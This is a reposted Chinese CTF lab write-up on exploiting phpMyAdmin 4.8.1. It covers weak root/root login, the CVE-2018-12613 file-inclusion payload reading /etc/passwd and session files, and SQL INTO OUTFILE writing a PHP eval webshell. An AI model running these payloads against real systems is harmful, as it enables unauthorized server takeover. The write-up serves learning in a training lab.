当前位置：网站首页>墨者学院-phpMyAdmin后台文件包含分析溯源

墨者学院-phpMyAdmin后台文件包含分析溯源

2022-07-04 07:40:00 【Lyswbb】

首先拿到题目到点击访问

访问后使用弱口令进行登陆，如登陆失败开启隐私模式或者更换浏览器

账户密码：root root

点击sql模块对sql语句进行一个查询

首先查询sql写一句话的权限

我们可以看到他的值为空

secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。

show global VARIABLES like '%secure%'

继续查看mysql安装的绝对路径，可以发现他是安装在/var/lib/mysql/

show VARIABLES like 'datadir'

接下来确认一下mysql权限，可以看到这里是最高权限root

SELECT USER();

权限和绝对路径都有了之后可以直接写入一句话了，先试一下phpinfo

select '<?php phpinfo(); ?>' into outfile '/var/lib/mysql/test.php';

当写进去之后访问失败，想了半天才发现这是mysql的路径，不是网站的绝对路径

继续想办法搞到网站的绝对路径根据题目可知是通过文件包含的方式写一个phpinfo，通过泄漏的绝对路径来shell，思路有了，直接干

首先确定下数据库版本，该版本为4.8.1。在根据数据库版本历史漏洞查询关于文件包含的编号是CVE-2018-12613

直接利用payload进行包含就行了

http://124.70.71.251:40917/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

先写入一个phpinfo进数据库

select '<?php phpinfo();?>';

再通过文件包含去调用phpinfo

首先获取session的值，在构造参数去访问phpinfo，获取绝对路径

http://124.70.71.251:45548/index.phpindex.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_[value]

有了绝对路径之后就可以写入webshell了,写入之后直接访问1.php

select "<?php @eval($_POST['cmd']) ?>" into outfile "/var/www/html/1.php";

使用管理工具登陆上去后到根下面直接去找key.txt 或者 find / -name key.txt

版权声明
本文为[Lyswbb]所创，转载请带上原文链接，感谢
https://blog.csdn.net/qq_47094508/article/details/125548784